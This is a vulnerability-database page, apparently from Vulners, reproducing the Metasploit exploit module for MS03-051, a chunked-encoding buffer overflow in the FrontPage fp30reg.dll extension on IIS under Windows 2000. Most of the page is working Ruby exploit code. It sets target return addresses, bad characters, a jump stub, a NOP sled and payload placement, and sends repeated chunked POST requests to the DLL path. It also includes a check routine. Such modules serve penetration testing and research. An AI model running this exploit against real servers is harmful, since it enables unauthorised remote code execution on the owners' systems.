Lucene search
K

MS03-051 Microsoft IIS ISAPI FrontPage fp30reg.dll Chunked Overflow

🗓️ 25 Jul 2010 21:37:54Reported by hdm <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 27 Views

MS03-051 Microsoft IIS ISAPI FrontPage fp30reg.dll Chunked Overflow, exploit for buffer overflow in Windows 200

Related
Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'MS03-051 Microsoft IIS ISAPI FrontPage fp30reg.dll Chunked Overflow',
      'Description'    => %q{
          This is an exploit for the chunked encoding buffer overflow
        described in MS03-051 and originally reported by Brett
        Moore. This particular modules works against versions of
        Windows 2000 between SP0 and SP3. Service Pack 4 fixes the
        issue.
      },
      'Author'         => [ 'hdm' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2003-0822'],
          [ 'OSVDB', '2952'],
          [ 'BID', '9007'],
          [ 'MSB', 'MS03-051'],
        ],
      'Privileged'     => false,
      'Payload'        =>
        {
          'Space'    => 1024,
          'BadChars' => "\x00\x2b\x26\x3d\x25\x0a\x0d\x20",
          'StackAdjustment' => -3500,

        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          ['Windows 2000 SP0-SP3',  { 'Ret' => 0x6c38a4d0  }],   # from mfc42.dll
          ['Windows 2000 07/22/02', { 'Ret' => 0x67d44eb1  }],   # from fp30reg.dll 07/22/2002
          ['Windows 2000 10/06/99', { 'Ret' => 0x67d4665d  }],   # from fp30reg.dll 10/06/1999
        ],
      'DisclosureDate' => '2003-11-11',
      'DefaultTarget' => 0))

    register_options(
      [
        OptString.new('URL', [ true,  "The path to fp30reg.dll", "/_vti_bin/_vti_aut/fp30reg.dll" ]),
      ])
  end

  def exploit

    print_status("Creating overflow request for fp30reg.dll...")

    pat = rand_text_alphanumeric(0xdead)
    pat[128, 4] = [target.ret].pack('V')
    pat[264, 4] = [target.ret].pack('V')

    # sub eax,0xfffffeff; jmp eax
    pat[160, 7] = "\x2d\xff\xfe\xff\xff" + "\xff\xe0"

    pat[280, 512] = make_nops(512)
    pat[792, payload.encoded.length] = payload.encoded

    0.upto(15) do |i|

      if (i % 3 == 0)
        print_status("Refreshing the remote dllhost.exe process...")

        res = send_request_raw({
          'uri' => normalize_uri(datastore['URL'])
        }, -1)

        if (res and res.body =~ /specified module could not be found/)
          print_status("The server states that #{datastore['URL']} does not exist.\n")
          return
        end
      end

      print_status("Trying to exploit fp30reg.dll (request #{i} of 15)")

      res = send_request_raw({
        'uri'     => normalize_uri(datastore['URL']),
        'method'  => 'POST',
        'headers' =>
        {
          'Transfer-Encoding' => 'Chunked'
        },
        'data'    => "DEAD\r\n#{pat}\r\n0\r\n"
      }, 5)

      if (res and res.body =~ /specified module could not be found/)
        print_status("The server states that #{datastore['URL']} does not exist.\n")
        return
      end

      handler

      select(nil,nil,nil,1)
    end
  end

  def check
    print_status("Requesting the vulnerable ISAPI path...")
    r = send_request_raw({
      'uri' => normalize_uri(datastore['URL'])
    }, -1)

    if (r and r.code == 501)
      return Exploit::CheckCode::Detected
    end
    return Exploit::CheckCode::Safe
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation